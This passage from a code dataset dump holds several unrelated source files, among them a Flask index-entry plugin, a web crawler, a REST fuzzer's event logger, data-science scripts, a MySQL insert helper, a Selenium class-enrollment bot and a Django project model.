index_entry.location or '' }}\">\n    </div>\n    <div class=\"form-group\">\n        <label for=\"source\">Source</label>\n        <input type=\"number\" id=\"source\" name=\"source\" value=\"{{ index_entry.source.id if index_entry.source else '' }}\">\n    </div>\n    <button type=\"submit\">Save</button>\n</form>\n{% endblock %}\n\"\"\"\n\nview_template = \"\"\"\n{% extends \"base.html\" %}\n{% block title %}Index entries - Quoted Forsooth{% endblock %}\n{% block pageContent %}\n\n<ul>\n    {%- for t in terms recursive %}\n    <li>{{t.part}}{% if t.entries %},\n        <ul>\n        {%- for entry in t.entries %}\n        <li>{{entry.source}} {{entry.location}}</li>\n        {%- endfor %}\n        </ul>\n    {%- endif %}\n    {%- if t.children %}\n        <ul>{{loop(t.children)}}</ul>\n    {%- endif %}\n    </li>\n    {%- endfor %}\n</ul>\n{% endblock %}\n\"\"\"\n\nplugin_section_template = \"\"\"\n<div class=\"panel\">\n    <div class=\"panel-heading\">Index entries (formatted)</div>\n    <table>\n        <thead>\n            <tr>\n                <th>Term</th>\n                <th>Location</th>\n            </tr>\n        </thead>\n        <tbody>\n            {%- for entry in index_entries %}\n            <tr>\n                <td>{{', '.join(entry.term.split('|'))}}</td>\n                <td>{{entry.location.replace('--', '–')|safe}}</td>\n            </tr>\n            {%- endfor %}\n        </tbody>\n    </table>\n</div>
\n\"\"\"\n\nclass IndexEntryPlugin(report_plugin.ReportPlugin):\n url_name = 'index_entries'\n\n class IndexEntry(db.Base):\n __tablename__ = 'plugin_index_entry'\n id = Column(Integer, primary_key=True)\n source_id = Column(Integer, ForeignKey('sources.id'), nullable=False, index=True)\n term = Column(String, nullable=False)\n sort_term = Column(String, nullable=True)\n location = Column(String, nullable=False)\n\n source = relationship('Source', backref='plugin_index_entry_entries')\n\n def __str__(self):\n return \", \".join(self.term.split('|'))\n\n def __repr__(self):\n return \"IndexEntry(id={}, source_id={}, term={!r}, location={!r})\".format(\n self.id, self.source_id, self.term, self.location)\n \n @property\n def _sortkey(self):\n return (self.sort_term.lower() if self.sort_term else self.term.lower(), self.term, natural_key(self.location))\n\n def __lt__(self, other):\n if not isinstance(other, IndexEntryPlugin.IndexEntry):\n raise NotImplementedError\n\n return self._sortkey < other._sortkey\n\n @staticmethod\n def edit(index_entry_id=None):\n with session_scope() as session:\n if index_entry_id:\n index_entry = session.query(db.IndexEntry).get(index_entry_id)\n if not index_entry:\n abort(404)\n else:\n index_entry = db.IndexEntry()\n if request.values.get('source_id', type=int):\n source = session.query(db.Source).get(request.values.get('source_id', type=int))\n if source:\n index_entry.source = source\n page = render_template_string(edit_template, index_entry=index_entry)\n session.rollback()\n return page\n\n @staticmethod\n def edit_post():\n with session_scope() as session:\n entry_id = request.form.get('db_id', type=int)\n if entry_id:\n entry = session.query(db.IndexEntry).get(entry_id)\n if not entry:\n abort(404)\n else:\n entry = db.IndexEntry()\n\n term = request.form.get('term')\n sort_term = request.form.get('sort_term')\n location = request.form.get('location')\n source_id = request.form.get('source', type=int)\n if not (term and location and source_id):\n abort(400)\n\n source = session.query(db.Source).get(source_id)\n if not source:\n abort(404)\n\n entry.source = source\n entry.location = location\n entry.term = '|'.join(x.strip() for x in term.split('|'))\n entry.sort_term = '|'.join(x.strip() for x in sort_term.split('|')) if sort_term else None\n\n session.add(entry)\n\n return redirect(source.internal_url)\n\n def view(self):\n with session_scope() as session:\n q = session.query(db.IndexEntry)\n\n source_id = request.values.get('source_id', type=int)\n if source_id:\n q = q.filter(db.IndexEntry.source_id == source_id)\n\n results = sorted(q)\n terms = []\n for term, l in groupby(results, lambda e: e.term):\n for t in terms:\n if term.split('|')[0] == t['part']:\n sub = t\n break\n else:\n newsub = {'part' : term.split('|')[0], 'entries' : [], 'children' : []}\n terms.append(newsub)\n sub = newsub\n for part in term.split('|')[1:]:\n if not any(part == t['part'] for t in sub['children']):\n newsub = {'part' : part, 'entries' : [], 'children' : []}\n sub['children'].append(newsub)\n sub = newsub\n else:\n for t in sub['children']:\n if part == t['part']:\n sub = t\n ents = sorted(l, key=lambda s: (s.source, natural_key(s.location)))\n entries = [{\n 'source' : g,\n 'location' : Markup(', '.join(e.location for e in l).replace('--', '–'))\n } for g, l in groupby(ents, lambda s: s.source)]\n sub['entries'] = entries\n\n return render_template_string(view_template, terms=terms)\n\n @classmethod\n def plugin_section(cls, source):\n if 
source.plugin_index_entry_entries:\n            index_entries = sorted(source.plugin_index_entry_entries)\n            entries = [{'term' : t, 'location' : ', '.join('<a href=\"{}\">{}</a>'.format(url_for('plugin.index_entry.edit', index_entry_id=e.id), e.location) for e in l)} for t, l in groupby(index_entries, lambda e: e.term)]\n            return render_template_string(plugin_section_template, index_entries=entries, source_id=source.id)\n        else:\n            return None\n\n    @classmethod\n    def plugin_link(cls, source):\n        return Markup('<a href=\"{}\">Add index entry</a>'.format(url_for('plugin.index_entry.edit', source_id=source.id)))\n\n    def activate(self):\n        setattr(db, 'IndexEntry', self.IndexEntry)\n        db.Base.metadata.create_all(db.engine, tables=[self.IndexEntry.__table__])\n        super().activate()\n        current_app.add_url_rule('/plugin/index_entry/<int:index_entry_id>/edit/', \"plugin.index_entry.edit\", self.edit)\n        current_app.add_url_rule('/plugin/index_entry/add/', \"plugin.index_entry.edit\", self.edit)\n        current_app.add_url_rule('/plugin/index_entry/edit/', \"plugin.index_entry.edit_post\", self.edit_post, methods=['POST'])\n        db.Source._plugin_sections.append(self.plugin_section)\n        db.Source._plugin_links.append(self.plugin_link)\n","sub_path":"plugins/index_entry.py","file_name":"index_entry.py","file_ext":"py","file_size_in_byte":9840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"70539327","text":"import pandas as pd\nimport numpy as np\n\nclass Report:\n\t\"\"\"\n\tDefines the consistent schema of reported fields\n\tthat aid evaluation of a black box DP implementation\n\t* res_df: It is a dataframe that contains repeated \n\tanalysis results across dimension and numerical\n\tcolumns. It could be exact or noisy based on the \n\tparameter actual = False or True in analysis\n\t* dim_cols: List of columns that contain dimension\n\tstrings\n\t* num_cols: List of columns that contain numerical\n\tDP results\n\t\"\"\"\n\tdef __init__(self, df):\n\t\tself.res_df = df\n\t\tself.dim_cols = []\n\t\tself.num_cols = []\n\n\t\tfor col in self.res_df:\n\t\t\tprint(self.res_df[col].dtype)\n\t\t\tif(self.res_df[col].dtype != np.number):\n\t\t\t\tself.dim_cols.append(col)\n\t\t\telse:\n\t\t\t\tself.num_cols.append(col)\n\t\t\n\t\tif(len(self.dim_cols) == 0):\n\t\t\tself.dim_cols.append(\"__dim__\")\n\n\t\tif(self.dim_cols[0] == \"__dim__\"):\n\t\t\tself.res_df[self.dim_cols[0]] = [\"key\"]*len(self.res_df)","sub_path":"sdk/opendp/whitenoise/evaluation/report/_report.py","file_name":"_report.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"638599871","text":"import re\nfrom urllib import request\nfrom urllib import error\nclass BDTB:\n    def __init__(self,TBCode):\n        self.TBCode = TBCode\n        self.url = 'http://tieba.baidu.com/p/' + self.TBCode\n    def getContent(self):\n        agent = 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0'\n        headers = {'User-Agent':agent}\n        try:\n            req = request.Request(self.url,headers = headers)\n            res = request.urlopen(req)\n            data = res.read().decode('UTF-8')\n        except error.URLError as e:\n            print(e.code)\n        with open('d://MyGit/PyCode/tb.txt', 'w+') as f:\n            f.write(data)\n        print(data.encode('utf-8').decode('utf-8'))\n        print(self.url)\n        return data\n    def getTotalPage(self, data):\n        pattern =r'(\\d+)\"页\"'\n        total = re.findall(pattern,self.getContent(),re.S)\n        print(total)\n\ntb = 
BDTB('5264180656')\ntb.getTotalPage(tb.getContent())\n","sub_path":"BDTBcrawler/BDTB.py","file_name":"BDTB.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"396060379","text":"import turtle, math\n\npen = turtle.Turtle()\nscrn = turtle.Screen()\n# wid = 1020\n# hght = wid\n# scrn.setworldcoordinates(10, 0, wid, hght)\n# scrn.screensize(1920, 1080)\nscrn.bgcolor('black')\npen.color('white')\npen.dot()\n\na = 200\nb = a / 2\n\ndef fnEllipse(x):\n y = round((b / a) * (math.sqrt(a ** 2 - x ** 2)), 2)\n return y\n\n# this only covers (-x, +y) and (+x, +y)\ncoordsEllipse = [(x, fnEllipse(x)) for x in range(-a, a+1)]\n\n# this only covers +ve y-axis i.e. (-x, +y) and (+x, +y)\nfor coord in coordsEllipse:\n pen.setpos((coord[0], coord[1]))\n\n# this covers -ve y-axis i.e. (+x, -y) and (-x, -y)\nfor coord in coordsEllipse:\n pen.setpos((coord[0], -coord[1]))\n\nturtle.done()\n\n","sub_path":"draw_shapes_using_fx.py","file_name":"draw_shapes_using_fx.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"450091928","text":"# Copyright 2017 Red Hat\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport time\nimport pickle\n\n\nclass Event(object):\n # Contains all the information about a method call\n def __init__(self, name=None, method=None, url=None, json_input=None,\n inputs=None, data=None):\n if data:\n self.__dict__ = data\n return\n self.start_time = time.time()\n self.name = name\n self.method = method\n self.url = url\n self.json_input = json_input\n self.json_output = None\n self.inputs = inputs\n self.outputs = None\n self.elapsed = 0\n self.code = -1\n self.tracebacks = []\n self.resources = None\n\n def get(self, item):\n if item in self.__dict__:\n return self.__dict__[item]\n\n def set_resp(self, resp):\n self.end_time = time.time()\n self.elapsed = self.end_time - self.start_time\n self.code = resp.status_code\n self.json_output = resp.text\n\n def render(self, color=''):\n def strip(txt):\n if not txt:\n return txt\n try:\n txt = \"\".join(list(filter(\n lambda x: ord(x) >= 32 and ord(x) < 127, txt)))\n except Exception:\n txt = \"(render-failed)\"\n return txt\n ftime = \"%s.%03.0f\" % (\n time.strftime(\"%Y-%m-%d %H:%M:%S\"),\n (self.start_time - int(self.start_time)) * 1000\n )\n tb = \"\"\n new_tb = []\n for t in self.tracebacks:\n if \"uniq_tb\" in t:\n new_tb.append(t[\"uniq_tb\"])\n tb += \", %s\" % t[\"tb_id\"]\n if new_tb:\n new_tb = \"\\n%s\" % \"\\n\".join(new_tb)\n else:\n new_tb = \"\"\n return \"[%s] \\033[93m%s\\033[0m: %s%d| curl -X %4s %s\\033[0m \" \\\n \"-d '%s' -> '%s'%s%s\" % (\n ftime, self.name, color,\n self.code, self.method, strip(self.url),\n strip(self.json_input), strip(self.json_output),\n tb, new_tb\n )\n\n def __str__(self):\n return self.render()\n\n def __repr__(self):\n return str(self)\n\n\nclass EventDb:\n def __init__(self, db_file):\n self.db = 
db_file\n\n def __del__(self):\n self.db.close()\n\n def append(self, event):\n pickle.dump(event.__dict__, self.db)\n\n def list(self):\n self.db.seek(0)\n try:\n while True:\n try:\n e = pickle.load(self.db)\n yield Event(data=e)\n except Exception:\n print(\"[+] could not pickle.load at offset\",\n self.db.tell())\n raise\n except EOFError:\n pass\n","sub_path":"restfuzz/event.py","file_name":"event.py","file_ext":"py","file_size_in_byte":3285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"544807002","text":"from __future__ import print_function\nimport sys, os.path, json, glob\nimport cv2, numpy as np\n\nfolders = glob.glob('dataset/' + sys.argv[1] + '/*/*')\n\nfor folder in folders:\n print(folder)\n\n if os.path.exists(folder + '/fixed'):\n continue\n\n with open(folder + '/faces.json', \"r\") as load_f:\n faces_json = json.load(load_f)\n padded_folder = folder + '/padded_faces/'\n \n for image_name, data in list(faces_json.items()):\n image = image_name.encode('utf-8').decode('utf-8')\n enc_image = image.encode('utf-8')\n\n with open(folder + '/' + enc_image, 'rb') as br:\n b = np.frombuffer(br.read(), dtype=np.uint8)\n img = cv2.imdecode(b, flags=1)\n if img is None:\n continue\n img_h, img_w = img.shape[0:2]\n\n for faceN, faceValue in list(data['faces'].items()):\n bounds = faceValue['bounds']\n l, r, t, b = bounds['left'], bounds['right'], bounds['top'], bounds['bottom']\n face_w, face_h = r - l, b - t\n\n square_dim = min(min(img_w, r + 0.7 * face_w) - max(0, l - 0.7 * face_w), min(img_h, b + face_h) - max(0, t - 0.4 * face_h))\n square_pad_w, square_pad_h = square_dim - face_w, square_dim - face_h\n pl, pr, pt, pb = max(0, int(l - 0.5 * square_pad_w)), min(img_w, int(r + 0.5 * square_pad_w)), max(0, int(t - 0.3 * square_pad_h)), min(img_h, int(b + 0.7 * square_pad_h))\n faces_json[image_name]['faces'][faceN]['padded_bounds'] = {'left' : pl, 'right' : pr, 'top' : pt, 'bottom' : pb}\n cv2.imwrite(padded_folder + str(faceN) + \"_\" + enc_image, img[pt:pb, pl:pr])\n\n with open(folder + '/faces.json', \"w\") as write_faces:\n json.dump(faces_json, write_faces)\n with open(folder + '/fixed', \"w\") as write_fixed:\n print('', file=write_fixed)\n","sub_path":"scripts/misc/fix_empty_padded.py","file_name":"fix_empty_padded.py","file_ext":"py","file_size_in_byte":1839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"199495660","text":"# encoding: utf-8\n\nimport fileinput\n\n# ask for the txt file with the answers\n\nanswers_txt = input(\"insert the name of the file with the answer-sheet in txt: \")\n\nwith open(answers_txt) as f:\n \n mylist = f.read().splitlines()\n\nanswer_list = []\n\nfor string in mylist:\n \n if string==\"A\" or string==\"B\" or string==\"C\" or string==\"D\":\n\n answer_list.append(string+\") \")\n\nas_len = len(answer_list)\n\nprint (answer_list, as_len)\n\nif as_len != 70:\n \n exit(\"did not get all the answers from the answer-sheet, exit the program\")\n\niter_num = -1\n\noriginal_file = input(\"insert the name of the raw file, still missing the answer-sheet: \")\n\ndef convert_to_string(lista):\n \n new_list = []\n\n for i in lista:\n\n new_list.append(str(i))\n\n return new_list \n\nzero_to_nine = list(range(0,10))\n\nzero_to_nine = convert_to_string(zero_to_nine)\n\nten_to_eighty = list(range(10,81))\n\nten_to_eighty = convert_to_string(ten_to_eighty)\n\n\nwith open(original_file, 'r') as input_file, open('output_file.txt', 'w') as 
output_file:\n \n for line in input_file:\n \n # print (answer_list[iter_num])\n \n if iter_num==as_len:\n\n break\n \n elif line[:3]==answer_list[iter_num]:\n \n string = line\n new_string = string[:1]+\":CORRECT)\"+string[2:]\n\n output_file.write(new_string)\n \n # print (line) \n # print (new_string)\n\n elif line[:7]==\"OPTIONS\":\n \n iter_num += 1\n \n output_file.write(line)\n \n elif (line[0] in zero_to_nine) and (line[1]==\".\"):\n \n deleted_num_point = line[0]+line[1]\n\n line = line.replace(deleted_num_point,\"\")\n\n output_file.write(line)\n\n\n elif (line[:2] in ten_to_eighty) and (line[2]==\".\"):\n\n deleted_num_point = line[0]+line[1]+line[2]\n\n line = line.replace(deleted_num_point,\"\")\n\n output_file.write(line)\n\n else:\n\n # print(line)\n output_file.write(line)\n\n\n\n","sub_path":"src/insert_answer_simulated.py","file_name":"insert_answer_simulated.py","file_ext":"py","file_size_in_byte":2064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"610368778","text":"#####################################################################\r\n################### VARIANCE INFLATION FACTOR #######################\r\n#####################################################################\r\n\r\n# REG1\r\ndf_reg1 = df_reg1.dropna()\r\ndf_reg2 = df_reg2.dropna()\r\n\r\ndf_reg1a = add_constant(df_reg1)\r\ndf_reg1a = df_reg1a.drop(['study','totalabsdiff'], axis=1)\r\n#VIF\r\nVIFreg1 = pd.Series([variance_inflation_factor(df_reg1a.values, i)\r\nfor i in range(df_reg1a.shape[1])],\r\nindex=df_reg1a.columns)\r\n\r\nreg1_index = (\"Constant\",\"Frequency\",\"Number of respondents\",\"Number of choice tasks\",\"Number of SKU's per task\",\"Number of SKU's in market\",\"Number of competitors\")\r\n\r\nVIFreg1tab = zip(reg1_index,VIFreg1)\r\nprint(tabulate(VIFreg1tab, tablefmt=\"latex_booktabs\"))\r\n# * Lot of multicol > shrinkage method, regression\r\n# ? 
ridge/lasso/elastic net\r\n\r\n# REG2\r\nX= add_constant(df_reg2)\r\n#VIF\r\npd.Series([variance_inflation_factor(X.values, i)\r\n for i in range(X.shape[1])],\r\n index=X.columns)\r\n# * No multicol > regular regression\r\n\r\n# FULL REG2B\r\ndf_reg2b2 = df_reg2b.drop(columns='study')\r\nX = add_constant(df_reg2b2)\r\n#VIF\r\npd.Series([variance_inflation_factor(X.values, i)\r\n for i in range(X.shape[1])],\r\n index=X.columns)\r\n","sub_path":"2vif.py","file_name":"2vif.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"171458349","text":"#!/home/delt/asvz_bot/asvz_bot/bin/python\n\n\"\"\"\nCreated on: Mar 20, 2019\nAuthor: Julian Stiefel\nEdited: Patrick Barton and Matteo Delucchi, October 2020\nLicense: BSD 3-Clause\nDescription: Script for automatic enrollment in ASVZ classes\n\"\"\"\n\nimport time\nimport math\nimport argparse\nimport configparser\nimport telegram_send\nimport geckodriver_autoinstaller\nfrom datetime import datetime, timedelta\nfrom selenium import webdriver\nfrom selenium.webdriver.firefox.options import Options\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.common.exceptions import NoSuchElementException\n\nday2int = {'Montag': 0,\n 'Dienstag': 1,\n 'Mittwoch': 2,\n 'Donnerstag': 3,\n 'Freitag': 4,\n 'Samstag': 5,\n 'Sonntag': 6}\n\n\ndef waiting_fct():\n def get_lesson_datetime(day, train_time):\n # find next date with that weekday\n nextDate = datetime.today().date()\n while nextDate.weekday() != day2int[day]:\n nextDate += timedelta(days=1)\n\n # combine with training time for complete date and time object\n lessonTime = datetime.strptime(train_time, '%H:%M').time()\n return datetime.combine(nextDate, lessonTime)\n\n lessonTime = get_lesson_datetime(config['lesson']['day'], config['lesson']['lesson_time'])\n enrollmentTime = lessonTime - timedelta(hours=config['lesson'].getint('enrollment_time_difference'))\n\n # Wait till enrollment opens if script is started before registration time\n delta = enrollmentTime - datetime.today()\n while delta > timedelta(seconds=60):\n print(\"Time till enrollment opens: \" + str(delta))\n if delta < timedelta(minutes=1):\n time.sleep(math.ceil(delta.total_seconds()))\n elif delta < timedelta(minutes=5):\n time.sleep(60)\n elif delta < timedelta(hours=1):\n time.sleep(5*60)\n else:\n time.sleep(60*60)\n delta = enrollmentTime - datetime.today()\n return\n\n\ndef asvz_enroll(args):\n print('Attempting enroll...')\n options = Options()\n options.headless = True\n options.add_argument(\"--private\") # open in private mode to avoid different login scenario\n driver = webdriver.Firefox(options=options)\n\n print('Attempting to get sportfahrplan')\n driver.get(config['lesson']['sportfahrplan_particular'])\n driver.implicitly_wait(5) # wait 5 seconds if not defined differently\n print(\"Sportfahrplan retrieved\")\n\n # find corresponding day div:\n day_ele = driver.find_element_by_xpath(\n \"//div[@class='teaser-list-calendar__day'][contains(., '\" + config['lesson']['day'] + \"')]\")\n\n # search in day div after corresponding location and time\n lesson_xpath = \".//li[@class='btn-hover-parent'][contains(., '\" + config['lesson']['facility'] + \"')][contains(., '\" \\\n + config['lesson']['lesson_time'] + 'bis'\"')]\"\n if config['lesson']['description']:\n lesson_xpath += \"[contains(., '\" + 
config['lesson']['description'] + \"')]\"\n\n    try:\n        lesson_ele = day_ele.find_element_by_xpath(lesson_xpath)\n    except NoSuchElementException:\n        # click on \"load more\" button\n        driver.find_element_by_xpath(\"//button[@class='btn btn--primary separator__btn']\").click()\n        lesson_ele = day_ele.find_element_by_xpath(lesson_xpath)\n\n    # check if the lesson is already booked out\n    full = len(lesson_ele.find_elements_by_xpath(\".//div[contains(text(), 'Keine freien')]\"))\n    if full:\n        print('Lesson already fully booked. Retrying in ' + str(args.retry_time) + 'min')\n        driver.quit()\n        time.sleep(args.retry_time * 60)\n        return False\n\n    # Save Lesson information for Telegram Message\n    message = lesson_ele.text\n    print(\"Booking: \", message)\n\n    lesson_ele.click()\n\n    WebDriverWait(driver, args.max_wait).until(EC.element_to_be_clickable((By.XPATH,\n        \"//a[@class='btn btn--block btn--icon relative btn--primary-border' or @class='btn btn--block btn--icon relative btn--primary']\"))).click()\n\n    # switch to new window:\n    time.sleep(2) # necessary because tab needs to be open to get window handles\n    tabs = driver.window_handles\n    driver.switch_to.window(tabs[1])\n    WebDriverWait(driver, args.max_wait).until(EC.element_to_be_clickable(\n        (By.XPATH, \"//button[@class='btn btn-default ng-star-inserted' and @title='Login']\"))).click()\n    WebDriverWait(driver, args.max_wait).until(EC.element_to_be_clickable(\n        (By.XPATH, \"//button[@class='btn btn-warning btn-block' and @title='SwitchAai Account Login']\"))).click()\n\n    # choose organization:\n    organization = driver.find_element_by_xpath(\"//input[@id='userIdPSelection_iddtext']\")\n    organization.send_keys(config['creds']['organisation'])\n    organization.send_keys(u'\\ue006')\n\n    driver.find_element_by_xpath(\"//input[@id='username']\").send_keys(config['creds']['username'])\n    driver.find_element_by_xpath(\"//input[@id='password']\").send_keys(config['creds']['password'])\n    driver.find_element_by_xpath(\"//button[@type='submit']\").click()\n    print('Logged in')\n\n    enroll_button_locator = (By.XPATH,\n        \"//button[@id='btnRegister' and @class='btn-primary btn enrollmentPlacePadding ng-star-inserted']\")\n    try:\n        WebDriverWait(driver, args.max_wait).until(EC.visibility_of_element_located(enroll_button_locator))\n    except Exception:\n        print('Element not visible. Probably fully booked. Retrying in ' + str(args.retry_time) + 'min')\n        driver.quit()\n        time.sleep(args.retry_time * 60)\n        return False\n\n    try:\n        enroll_button = WebDriverWait(driver, args.max_wait).until(EC.element_to_be_clickable(enroll_button_locator))\n    except Exception:\n        driver.quit()\n        raise Exception('Enroll button is disabled. Enrollment is likely not open yet.')\n\n    print('Waiting for enroll button to be enabled')\n    WebDriverWait(driver, 90).until(lambda d: 'disabled' not in enroll_button.get_attribute('class'))\n    enroll_button.click()\n    print(\"Successfully enrolled. 
Train hard and have fun!\")\n\n WebDriverWait(driver, 2)\n driver.quit() # close all tabs and window\n return message\n\n\n# ==== run enrollment script ============================================\n\n# Check if the current version of geckodriver exists\n# and if it doesn't exist, download it automatically,\n# then add geckodriver to path\ngeckodriver_autoinstaller.install()\n\nparser = argparse.ArgumentParser(description='ASVZ Bot script')\nparser.add_argument('config_file', type=str, help='config file name')\nparser.add_argument('--retry_time', type=int, default=5,\n help='Time between retrying when class is already fully booked in seconds')\nparser.add_argument('--max_wait', type=int, default=20, help='Max driver wait time (s) when attempting an action')\nparser.add_argument('-t', '--telegram_notifications', action='store_true', help='Whether to use telegram-send for notifications')\nargs = parser.parse_args()\n\nconfig = configparser.ConfigParser(allow_no_value=True)\nconfig.read(args.config_file)\nconfig.read('credentials.ini')\n\nwaiting_fct()\n\n# If lesson is already fully booked keep retrying in case place becomes available again\nsuccess = False\nwhile not success:\n try:\n success = asvz_enroll(args)\n except:\n if args.telegram_notifications:\n telegram_send.send(messages=['Script stopped. Exception occurred :('])\n raise\n\nif args.telegram_notifications:\n telegram_send.send(messages=['Enrolled successfully :D', \"------------\", success])\nprint(\"Script finished successfully\")\n","sub_path":"asvz_bot.py","file_name":"asvz_bot.py","file_ext":"py","file_size_in_byte":7706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"379056751","text":"import mysql.connector\nimport datetime\n\nclass InsertDB:\n \n mydb_name = \"arizona_zillow_db\"\n\n def insert_document(self, documents, table_name):\n print(documents)\n\n # ************** DIGITAL SERVER ***************#\n mydb = mysql.connector.connect(\n user = \"root\",\n password = \"\",\n host = \"192.168.1.118\"\n )\n\n mycursor = mydb.cursor()\n\n mycursor.execute(\"CREATE DATABASE IF NOT EXISTS \" + self.mydb_name + \" CHARACTER SET utf8 COLLATE utf8_general_ci\")\n\n # ********** DIGITAL OCEAN SERVER ***********#\n mydb = mysql.connector.connect(\n user = \"root\",\n password = \"\",\n host = \"192.168.1.118\",\n database = self.mydb_name\n )\n\n documents = documents[0]\n print(documents)\n\n mycursor = mydb.cursor()\n\n stmt = \"SHOW TABLES LIKE '{}'\".format(table_name)\n mycursor.execute(stmt)\n result = mycursor.fetchone()\n\n if not result:\n sql = \"CREATE TABLE {} (id INT(11) UNSIGNED AUTO_INCREMENT PRIMARY KEY, PropertyAddress VARCHAR(50), Street VARCHAR(30), City VARCHAR(20), State VARCHAR(20), ZipCode VARCHAR(10), StatusText VARCHAR(50), PhoneNumber VARCHAR(15), Identifier VARCHAR(100), CreatedTime VARCHAR(30), UpdatedTime VARCHAR(30), INDEX (Identifier))\".format(table_name)\n\n mycursor.execute(sql)\n mydb.commit()\n\n\n sql = \"SELECT Identifier FROM {0} WHERE Identifier='{1}'\".format(table_name, documents[7])\n mycursor.execute(sql)\n identifier_result = mycursor.fetchone()\n\n if not identifier_result:\n insert_sql = \"\"\"INSERT INTO {} (PropertyAddress, Street, City, State, ZipCode, StatusText, PhoneNumber, Identifier, CreatedTime, UpdatedTime) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\"\"\".format(table_name)\n\n mycursor.execute(insert_sql, documents)\n mydb.commit()\n\n else:\n update_sql = 'UPDATE {0} SET PropertyAddress=\"{1}\", Street=\"{2}\", 
City=\"{3}\", State=\"{4}\", ZipCode=\"{5}\", StatusText=\"{6}\", PhoneNumber=\"{7}\", UpdatedTime=\"{8}\" WHERE Identifier=\"{9}\"'.format(table_name, documents[0], documents[1], documents[2], documents[3], documents[4], documents[5], documents[6], datetime.datetime.now(), documents[7])\n            print(update_sql)\n            mycursor.execute(update_sql)\n\n        mydb.commit()\n        print(\"==================> Now time:\", datetime.datetime.now())","sub_path":"Maricopa_County/fitlering Script/insertdatabase.py","file_name":"insertdatabase.py","file_ext":"py","file_size_in_byte":2493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"223737274","text":"from collections import defaultdict\n\nfrom django.conf import settings\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.contrib.sites.models import Site\nfrom django.core.mail import EmailMessage\nfrom django.core.urlresolvers import reverse\nfrom django.db import models\nfrom django.template.loader import render_to_string\nfrom django.utils.safestring import mark_safe\nfrom django_fsm import FSMField\nfrom django_fsm import transition\nfrom menus.menu_pool import menu_pool\n\nfrom casereport.middleware import CurrentUserMiddleware\nfrom rlp.accounts.models import Institution, User\nfrom rlp.core.email import send_transactional_mail\nfrom rlp.core.mixins import SharesContentMixin\nfrom rlp.core.models import SEOMixin\n\nfrom actstream.models import Action\n\nfrom logging import getLogger\nlogger = getLogger('django')\n\nMEMBER_STATES = (\n    ('moderator', 'Moderator'),\n    ('member', 'Member'),\n    ('pending', 'Applicant'),\n    ('ignored', 'Ignored Applicant')\n)\n\n\nclass Topic(SEOMixin):\n    order = models.PositiveIntegerField(default=0, db_index=True)\n\n    class Meta:\n        ordering = ['order']\n\n\nclass Project(SEOMixin, SharesContentMixin):\n    cover_photo = models.ImageField(null=True, blank=True)\n    institution = models.ForeignKey(Institution, blank=True, null=True)\n    topic = models.ForeignKey(Topic, blank=True, null=True)\n    approval_required = models.BooleanField(default=True,\n        help_text='If checked, registrants must be approved before joining.')\n    auto_opt_in = models.BooleanField('Automatically opt-in members', default=False,\n        help_text='If checked, all members will be automatically added to this project.')\n    users = models.ManyToManyField(settings.AUTH_USER_MODEL,\n        through=\"ProjectMembership\",\n        through_fields=['project','user'],\n        related_name='projects')\n    goal = models.CharField(max_length=450, blank=True)\n    order = models.PositiveIntegerField(default=0, db_index=True)\n    created = models.DateTimeField(auto_now_add=True)\n\n    @property\n    def display_type(self):\n        return mark_safe('<a href=\"{url}\">{repr}</a>'.format(url=self.get_absolute_url(), repr=self.title))\n\n    class Meta:\n        ordering = ['order', 'title']\n\n    def __str__(self):\n        return self.title\n\n    def get_absolute_url(self):\n        from django.core.urlresolvers import reverse\n        return reverse('projects:projects_detail', kwargs={'pk': self.pk, 'slug': self.slug})\n\n    def get_activity_stream(self, user=None, type_class=None):\n        my_ct = ContentType.objects.get_for_model(self)\n        activity_stream_queryset = Action.objects.filter(target_content_type=my_ct,\n            target_object_id=self.id)\n\n        # TODO: consolidate this\n        if user and not user.is_staff:\n            from casereport.models import CaseReport\n            casereport_ct = ContentType.objects.get_for_model(CaseReport)\n            my_ct = ContentType.objects.get_for_model(self)\n            # not loving this, but can't use expressions like\n            # 
